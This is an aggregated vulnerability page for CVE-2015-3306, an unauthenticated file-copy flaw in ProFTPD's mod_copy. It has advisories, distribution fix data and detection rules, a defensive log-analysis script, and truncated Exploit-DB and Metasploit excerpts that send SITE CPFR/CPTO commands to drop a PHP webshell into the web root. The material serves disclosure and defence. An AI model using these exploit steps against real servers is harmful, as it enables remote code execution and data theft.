CVE-2015-3306
published 2015-05-18
CVE-2015-3306: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
Priority P1 81 critical 10 CVSS 2.0
AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 96.80% (99.9th percentile)
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | proftpd-dfsg | < proftpd-dfsg 1.3.5-2 (bookworm) | proftpd-dfsg 1.3.5-2 (bookworm) |
| debian | proftpd-dfsg | < proftpd-dfsg 1.3.6-6 (bookworm) | proftpd-dfsg 1.3.6-6 (bookworm) |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| proftpd | proftpd | <= 1.3.5b | — |
| proftpd | proftpd | — | — |
| siemens | simatic_cp_1543-1_firmware | >= 2.0 < 2.2 | 2.2 |
Detection & IOCs (extracted from sources)
command: SITE CPTO /tmp/.<random>
yara words: ["Copy successful"]
- Detect unauthenticated SITE CPFR / SITE CPTO FTP command sequences — the exploit chain requires no authentication and uses these two commands to stage and drop a PHP webshell.
- Alert on FTP sessions that issue SITE CPFR targeting /proc/self/cmdline or /proc/self/fd/3 — these are the specific proc paths used to smuggle a PHP payload.
- Alert on FTP sessions that issue SITE CPTO to web-accessible directories (e.g. /var/www) with a .php extension — this is the final step that enables HTTP-triggered RCE.
- Check FTP server response for '350' to SITE CPFR /etc/passwd as a vulnerability-check indicator — the Metasploit module uses this response to confirm exploitability.
- Monitor HTTP requests to randomly-named .php files in the web root immediately following an FTP session — the exploit executes the dropped payload via a GET request.
- Look for the string 'Copy successful' in FTP server responses as a network-level indicator that a SITE CPFR/CPTO operation completed successfully.
- Anonymous FTP access is disabled by default when installing ProFTPD via APT or YUM, but is ENABLED by default in source installs from proftpd.org — source-installed servers are exploitable without any credentials.
- The mod_copy module (which contains the vulnerable SITE CPFR/CPTO commands) was not included in default ProFTPD installations until version 1.3.4 — earlier versions are not affected.
- The ProFTPD service runs as 'nobody' by default, meaning copied files and executed payloads inherit those low privileges — but this is still sufficient for webshell deployment if the web directory is world-writable.
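The detection points listed above can be combined into a single per-session check over FTP command logs. This is an added example, not code from any source quoted on this page; the log layout (`session client_ip reply_code command`), the rule names and the `/var/www/` web root are assumptions, and the sample lines are constructed.

```python
import posixpath
import re
from collections import defaultdict

# Constructed sample log. Assumed layout: "<session> <client_ip> <reply_code> <command>"
SAMPLE_LOG = """\
s1 198.51.100.7 350 SITE CPFR /proc/self/cmdline
s1 198.51.100.7 250 SITE CPTO /tmp/.abc123
s1 198.51.100.7 350 SITE CPFR /tmp/.abc123
s1 198.51.100.7 250 SITE CPTO /var/www/html/x9f2.php
s2 192.0.2.10 331 USER alice
s2 192.0.2.10 230 PASS (hidden)
s2 192.0.2.10 350 SITE CPFR /home/alice/report.txt
s2 192.0.2.10 250 SITE CPTO /home/alice/report.bak
s3 203.0.113.5 350 SITE CPFR /etc/passwd
"""

LINE = re.compile(r"^(\S+) (\S+) (\d{3}) (.*)$")
SITE_COPY = re.compile(r"^SITE\s+(CPFR|CPTO)\s+(\S.*)$", re.IGNORECASE)
WEB_ROOTS = ("/var/www/",)  # assumption: adjust to the served document roots


def analyze(log_text):
    """Return {session: sorted rule names} for sessions matching the detection points."""
    authed = set()                 # sessions that completed login (230 reply to PASS)
    findings = defaultdict(set)
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue               # skip lines that do not follow the assumed layout
        session, _ip, code, cmd = m.groups()
        if cmd.upper().startswith("PASS") and code == "230":
            authed.add(session)
            continue
        c = SITE_COPY.match(cmd)
        if not c:
            continue
        verb = c.group(1).upper()
        # Normalise so "/var/www/../www/x.php"-style paths still match the prefixes
        path = posixpath.normpath(c.group(2).strip())
        unauth = session not in authed
        # 350 (CPFR accepted) / 250 (copy done) before login means the server is exposed
        if unauth and code in ("350", "250"):
            findings[session].add("unauthenticated-copy")
        if verb == "CPFR" and path.startswith("/proc/self/"):
            findings[session].add("proc-self-source")
        if verb == "CPFR" and unauth and path == "/etc/passwd" and code == "350":
            findings[session].add("vuln-check-probe")
        if verb == "CPTO" and path.startswith(WEB_ROOTS) and path.lower().endswith(".php"):
            findings[session].add("php-drop-in-webroot")
    return {s: sorted(rules) for s, rules in findings.items()}


if __name__ == "__main__":
    for session, rules in analyze(SAMPLE_LOG).items():
        print(session, ", ".join(rules))
```

A session flagged `php-drop-in-webroot` is worth correlating with web server access logs for requests to the same file name shortly afterwards.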
CVSS provenance
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
osv10.0CRITICAL
vendor_debian10.0LOW
GHSA
GHSA-f989-xw5v-4w5p: An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1
ghsa_unreviewed·2022-05-24·CVSS 10.0
CVE-2019-12815 [CRITICAL] CWE-755 GHSA-f989-xw5v-4w5p: An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1
An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.
GHSA
GHSA-4mfj-5wr8-x32q: The mod_copy module in ProFTPD 1
ghsa_unreviewed·2022-05-13
CVE-2015-3306 [HIGH] CWE-284 GHSA-4mfj-5wr8-x32q: The mod_copy module in ProFTPD 1
The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
OSV
CVE-2019-12815: An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1
osv·2019-07-19·CVSS 10.0
CVE-2019-12815 [CRITICAL] CVE-2019-12815: An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1
An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.
OSV
CVE-2015-3306: The mod_copy module in ProFTPD 1
osv·2015-05-18·CVSS 10.0
CVE-2015-3306 [CRITICAL] CVE-2015-3306: The mod_copy module in ProFTPD 1
The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
Debian
CVE-2019-12815: proftpd-dfsg - An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows ...
vendor_debian·2019·CVSS 10.0
CVE-2019-12815 [CRITICAL] CVE-2019-12815: proftpd-dfsg - An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows ...
An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to CVE-2015-3306.
Scope: local
bookworm: resolved (fixed in 1.3.6-6)
bullseye: resolved (fixed in 1.3.6-6)
forky: resolved (fixed in 1.3.6-6)
sid: resolved (fixed in 1.3.6-6)
trixie: resolved (fixed in 1.3.6-6)
Debian
CVE-2015-3306: proftpd-dfsg - The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write t...
vendor_debian·2015·CVSS 10.0
CVE-2015-3306 [CRITICAL] CVE-2015-3306: proftpd-dfsg - The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write t...
The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
Scope: local
bookworm: resolved (fixed in 1.3.5-2)
bullseye: resolved (fixed in 1.3.5-2)
forky: resolved (fixed in 1.3.5-2)
sid: resolved (fixed in 1.3.5-2)
trixie: resolved (fixed in 1.3.5-2)
No detection rules found.
Exploit-DB
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
exploitdb·2021-05-26·CVSS 10.0
CVE-2015-3306 [CRITICAL] ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
---
# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)
# Date: 25/05/2021
# Exploit Author: Shellbr3ak
# Version: 1.3.5
# Tested on: Ubuntu 16.04.6 LTS
# CVE : CVE-2015-3306
#!/usr/bin/env python3
import sys
import socket
import requests
def exploit(client, target):
client.connect((target,21)) # Connecting to the target server
banner = client.recv(74)
print(banner.decode())
client.send(b'site cpfr /etc/passwd\r\n')
print(client.recv(1024).decode())
client.send(b'site cpto \r\n') # phpinfo() is just a PoC.
print(client.recv(1024).decode())
client.send(b'site cpfr /proc/self/fd/3\r\n')
print(client.recv(1024).decode())
client.send(b'site cpto /var/www/html/test.php\r\n')
print(client.recv(1024).decode())
clien
Exploit-DB
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)
exploitdb·2015-06-10
CVE-2015-3306 ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'ProFTPD 1.3.5 Mod_Copy Command Execution',
'Description' => %q{
This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
Any unauthenticated client can leverage these commands to copy files from any
part of the filesystem to a chosen destination. The copy commands are executed with
the rights of the ProFTPD service, which by default runs under the privileges of the
'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
directory, PHP remote code execution is made possible.
},
'Author' =>
[
'Vadim Melihow', # Or
Exploit-DB
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution
exploitdb·2015-04-21
CVE-2015-3306 ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution
---
# Title: ProFTPd 1.3.5 Remote Command Execution
# Date : 20/04/2015
# Author: R-73eN
# Software: ProFTPd 1.3.5 with mod_copy
# Tested : Kali Linux 1.06
# CVE : 2015-3306
# Greetz to Vadim Melihow for all the hard work .
import socket
import sys
import requests
#Banner
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if(len(sys.argv) '
s.connect((server, 21))
s.recv(1024)
print '[ + ] Connected to server [ + ] \n'
s.send('sit
Exploit-DB
ProFTPd 1.3.5 - File Copy
exploitdb·2015-04-13
CVE-2015-3306 ProFTPd 1.3.5 - File Copy
---
Description TJ Saunders 2015-04-07 16:35:03 UTC
Vadim Melihow reported a critical issue with proftpd installations that use the
mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands
to be used by *unauthenticated clients*:
Trying 80.150.216.115...
Connected to 80.150.216.115.
Escape character is '^]'.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
214-CPFR pathname
214-CPTO pathname
214-UTIME YYYYMMDDhhmm[ss] path
214-SYMLINK source destination
214-RMDIR path
214-MKDIR path
214-The following SITE extensions are recognized:
214-RATIO -- show all ratios in effect
214-QUOTA
214-HELP
214-CHGRP
214-CHMOD
214 Direct comments to root@www01a
site c
Metasploit
ProFTPD 1.3.5 Mod_Copy Command Execution
metasploit
This module exploits the SITE CPFR/CPTO mod_copy commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.
Nuclei
ProFTPd - Remote Code Execution
nuclei·CVSS 10.0
CVE-2015-3306 [CRITICAL] ProFTPd - Remote Code Execution
ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
Template:
```yaml
id: CVE-2015-3306
info:
  name: ProFTPd - Remote Code Execution
  author: pdteam
  severity: critical
  description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code with the privileges of the ProFTPd process.
  remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
  reference:
    - https://github.com/t0kx/exploit-CV
```
arXiv
Talos: Neutralizing Vulnerabilities with Security Workarounds for Rapid Response
arxiv_fulltext·2017-11-02
Zhen Huang, Mariana D'Angelo, Dhaval Miyani, David Lie
University of Toronto
{z.huang,mariana.dangelo,dhaval.miyani}@mail.utoronto.ca, [email protected]
## Abstract
There is often a considerable delay between the discovery of a vulnerability and the issue of a patch. One way to mitigate this window of vulnerability is to use a configuration workaround, which prevents the vulnerable code from being executed at the cost of some lost functionality -- but only if one is available. Since application configurations are not specifically designed to mitigate software vulnerabilities, we find that they only cover 25.2% of vulnerabilities.
To minimize patch delay vulnerabilities and address the lim
CTF
README
ctf_writeups·CVSS 9.8
[CRITICAL] README
# Boot to root CTFs
Walkthroughs and notes of 'boot to root' CTFs mostly from VulnHub that I did for fun. I like to use vulnerable VMs from VulnHub (in addition to the ones I create) to organize hands-on penetration testing training sessions for junior security auditors/consultants :-)
### >> Classic pentest methodology to do a Boot2root CTF upload a Webshell)
➤ Clear-text passwords stored in 'public' website pages, configuration files, log files
➤ ...
2. Exploiting unpatched known vulnerabilities
➤ Web server (e.g. Apache Struts RCE: CVE-2017-12611/CVE-2017-9805/CVE-2017-9791, JBoss Java Deserialization RCE)
➤ Bash & web server CGI (e.g. Shellshock RCE CVE-2014-6271/CVE-2014-7169)
➤ Web CMS (e.g. Drupalgeddon2 RCE CVE-2018-7600)
➤ Web framework (e.g. PHP CGI RCE CVE-2012-1823)
➤ FTP s
Bugzilla
CVE-2019-12815 proftpd: file copy vulnerability in mod_copy allows for remote code execution
bugzilla·2019-07-23·CVSS 10.0
CVE-2019-12815 [CRITICAL] CVE-2019-12815 proftpd: file copy vulnerability in mod_copy allows for remote code execution
An arbitrary file copy vulnerability in mod_copy in ProFTPD up to 1.3.5b allows for remote code execution and information disclosure without authentication, a related issue to (is facilitated by) CVE-2015-3306.
Upstream Issue:
http://bugs.proftpd.org/show_bug.cgi?id=4372
Upstream Patch:
https://github.com/proftpd/proftpd/pull/816
Discussion:
Created proftpd tracking bugs for this issue:
Affects: epel-all [bug 1732367]
Affects: fedora-all [bug 1732366]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.
Bugzilla
CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy [fedora-all]
bugzilla·2015-04-16·CVSS 10.0
CVE-2015-3306 [CRITICAL] CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects m
Bugzilla
CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy
bugzilla·2015-04-16·CVSS 10.0
CVE-2015-3306 [CRITICAL] CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy
Vadim Melihow reported a critical issue with proftpd installations that use the
mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands
to be used by *unauthenticated clients*:
http://bugs.proftpd.org/show_bug.cgi?id=4169
Upstream fix: https://github.com/proftpd/proftpd/pull/109
Discussion:
Created proftpd tracking bugs for this issue:
Affects: fedora-all [bug 1212388]
Affects: epel-all [bug 1212389]
---
proftpd-1.3.5-6.fc22 has been pushed to the Fedora 22 stable repository. If problems still persist, please make note of it in this bug report.
---
proftpd-1.3.4e-3.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note
Bugzilla
CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy [epel-all]
bugzilla·2015-04-16·CVSS 10.0
CVE-2015-3306 [CRITICAL] CVE-2015-3306 proftpd: unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affect
Tenable
CVE-2019-12815: Improper Access Control Vulnerability in ProFTPD Disclosed
blogs_tenable·2019-07-23·CVSS 9.8
[CRITICAL] CVE-2019-12815: Improper Access Control Vulnerability in ProFTPD Disclosed
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157581.html
- http://lists.opensuse.org/opensuse-updates/2015-06/msg00020.html
- http://packetstormsecurity.com/files/131505/ProFTPd-1.3.5-File-Copy.html
- http://packetstormsecurity.com/files/131555/ProFTPd-1.3.5-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/131567/ProFTPd-CPFR-CPTO-Proof-Of-Concept.html
- http://packetstormsecurity.com/files/132218/ProFTPD-1.3.5-Mod_Copy-Command-Execution.html
- http://packetstormsecurity.com/files/162777/ProFTPd-1.3.5-Remote-Command-Execution.html
- http://www.debian.org/security/2015/dsa-3263
- http://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_modcopy_exec
- http://www.securityfocus.com/bid/74238
- https://www.exploit-db.com/exploits/36742/
- https://www.exploit-db.com/exploits/36803/
2015-05-18
Published